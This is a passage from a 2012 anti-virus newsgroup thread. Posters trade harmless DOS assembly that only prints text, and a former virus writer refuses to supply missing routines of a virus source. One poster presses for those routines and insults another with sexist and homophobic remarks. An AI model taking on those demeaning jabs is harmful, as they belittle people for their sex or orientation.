    know what i was upto, and since this code has no anti-debug tricks, he'd
    open it right up.

    And before you ask, I *won't* be sharing code like that with you, in any
    language. You can do it in asic too, my viruses all do. [g]

    It's one of the routines I left out. hehehehehehehe

    Honest reason being, you have no legitimate need to know how to do
    things like that. You can think I'm ducking out on it if you want, or
    being evasive.. but, in all actuality; I really can't ethically explain
    the details or provide functional source code that will do any of those
    functions so that you or someone else would understand it.

    If I do, I place my credits and access in serious jeopardy. You just
    don't understand the effort I put into it.It took me years to earn the
    respect of my peers from the av/am communities. They knew of my
    background in Vx, I had to prove myself. That I wasn't upto no good or
    setting anyone up. It's been 12 years, nothing malicious has been
    authored by me; nor have I helped anyone write malicious code.

    So, you can believe the anonymous remailer who thinks I only know basic
    and probably not even that.. OR! You can go with option 2, and believe
    Kurt and FromtheRafters oh, and me.

    One last comment, I worked for malwarebytes for two years. That's a long
    long time to bullshit people and get away with it. Especially technical
    people who expect you to study malware everyday, all day. People who,
    like me, know this shit. It was good money, but I earned every penny of
    it. [g]

    So think what you want, troll all you like. I am who I say I am, I have
    done what I've said I've done.

    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #15
  16. RayLopez99

    Dustin Guest

    "Ant" <> wrote in news:h5udnX-
    :

    > "G. Morgan" wrote:
    >
    >> How do I manually assemble it with 'debug'?

    >
    > a
    > mov dx,010c
    > mov ah,09
    > int 21
    > mov ax,4c00
    > int 21
    > db 42
    > db 6f
    > db 6f
    > db 21
    > db 24
    >
    > g
    >
    >
    >


    Ant. :) Why you... lol



    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #16
  17. RayLopez99

    Dustin Guest

    "Ant" <> wrote in news:h5udnX-
    :

    > "G. Morgan" wrote:
    >
    >> How do I manually assemble it with 'debug'?

    >
    > a
    > mov dx,010c
    > mov ah,09
    > int 21
    > mov ax,4c00
    > int 21
    > db 42
    > db 6f
    > db 6f
    > db 21
    > db 24
    >
    > g
    >
    >


    Cute message btw.. [g]


    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the way.
    I ain't got much time. Young ones close behind. I can't wait in line.
     
    Dustin, Jul 28, 2012
    #17
  18. RayLopez99

    G. Morgan Guest

    Ant wrote:

    >"G. Morgan" wrote:
    >
    >> How do I manually assemble it with 'debug'?

    >
    >a
    >mov dx,010c
    >mov ah,09
    >int 21
    >mov ax,4c00
    >int 21
    >db 42
    >db 6f
    >db 6f
    >db 21
    >db 24
    >
    >g
    >


    Boo! <g>
     
    G. Morgan, Jul 28, 2012
    #18
  19. RayLopez99

    RayLopez99 Guest

    On Saturday, July 28, 2012 6:31:17 AM UTC-4, Ant wrote:
    > "G. Morgan" wrote:
    >
    >
    >
    > > How do I manually assemble it with 'debug'?

    >
    >
    >
    > a
    >
    > mov dx,010c
    >
    > mov ah,09
    >
    > int 21
    >
    > mov ax,4c00
    >
    > int 21
    >
    > db 42
    >
    > db 6f
    >
    > db 6f
    >
    > db 21
    >
    > db 24
    >
    >
    >
    > g


    // Dustin code

    segment code

    start:
    mov ax,data
    mov ds,ax
    mov ax,stack
    mov ss,ax
    mov sp,stacktop

    mov dx,hello
    mov ah,9
    int 0x21

    mov ax,0x4c00
    int 0x21

    segment data

    hello: db 'hello, ****ing, world',13,10,'$'

    segment stack stack
    resb 64
    stacktop:
    // end


    Ant, or Dustin: can you please go through this code line by line? I appreciate it. It's short enough that I think you can comment without too much effort.

    Thanks in advance. Seems Ant's code is more compact, whereas Dustin, as G. Morgan points out implicitly, may be faking it or taking shortcuts (not clear which as apparently it does not compile).

    I intend to to use this for assembly programming (using Visual Studio): http://www.codeproject.com/Articles/271627/Assembly-Programming-with-Visual-Studio-2010

    RL
     
    RayLopez99, Jul 28, 2012
    #19
  20. RayLopez99

    RayLopez99 Guest

    On Saturday, July 28, 2012 2:24:56 AM UTC-4, Dustin wrote:
    > I forgot to ask... :) So pardon me for making yet another post! in this
    >
    > thread of yours...
    >


    No problem Dustin, ask away. It seems to me you, unlike Ant, unlike Morgan, unlike me, unlike some others here, enjoy the "drama" or "human interest"aspect of this thread more than the technical part. That's fine, but it reminds me of a woman. She is more interested in such things as the color of a car rather than actually looking under the hood. It's OK though.


    >
    >
    > Do you really think anyones going to tell you what the code is doing?
    >
    > it's partial source to a known virus dude. A well known, potentially
    >
    > harmful virus. Nobodies going to help you get it up and running.
    >
    >


    ? I don't understand your assumptions. Perhaps you are projecting yours.

    >
    > Fact is, nobody besides me has the source code. Do you know why? Go
    >
    > ahead, try googling for irok v1.1c source files. You won't find them.
    >
    >
    >
    > C'mon Ray. You said you're a programmer (Well, you said coder first,
    >
    > but.. I digress).. We'll go with programmer... Why would I be the only
    >
    > person to have the source code?
    >


    The only reasons would be that you intend to produce other viruses based onthis source code, and you feel (a) the anti-virus companies could spot your new viruses easier if they had this source, or (b) more importantly, you don't want other virus writers easily replicating what you did if they had this source. But even those logical reasons are faulty, but I won't get into it here.

    > as you don't require fully functional Ray, why the need for some
    >
    > specific subroutines I sorta, neglected to provide? [g]
    >
    >


    Because some interesting things are there. BTW, encryption as you mention in another post is rather routine in assembly, I found out Googling it.

    You wanna talk color Dustin? By all means my gay-ish friend. It's kind offun sure and it's something you appear to excel in. You asked me about myage earlier and all I can say on that is that I'm probably younger than you.

    RL
     
    RayLopez99, Jul 28, 2012
    #20
    1. Advertisements

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. .
    Replies:
    6
    Views:
    975
    Dark vader
    Aug 12, 2003
  2. Sugien
    Replies:
    0
    Views:
    318
    Sugien
    Sep 7, 2003
  3. Clive

    shall I renew my NOD32 licence?

    Clive, Oct 15, 2003, in forum: Anti-Virus
    Replies:
    5
    Views:
    203
    John Morse
    Oct 16, 2003
  4. Lets Make Some Money

    , Jan 10, 2005, in forum: Anti-Virus
    Replies:
    0
    Views:
    196
  5. 4Q
    Replies:
    1
    Views:
    192
Loading...

Share This Page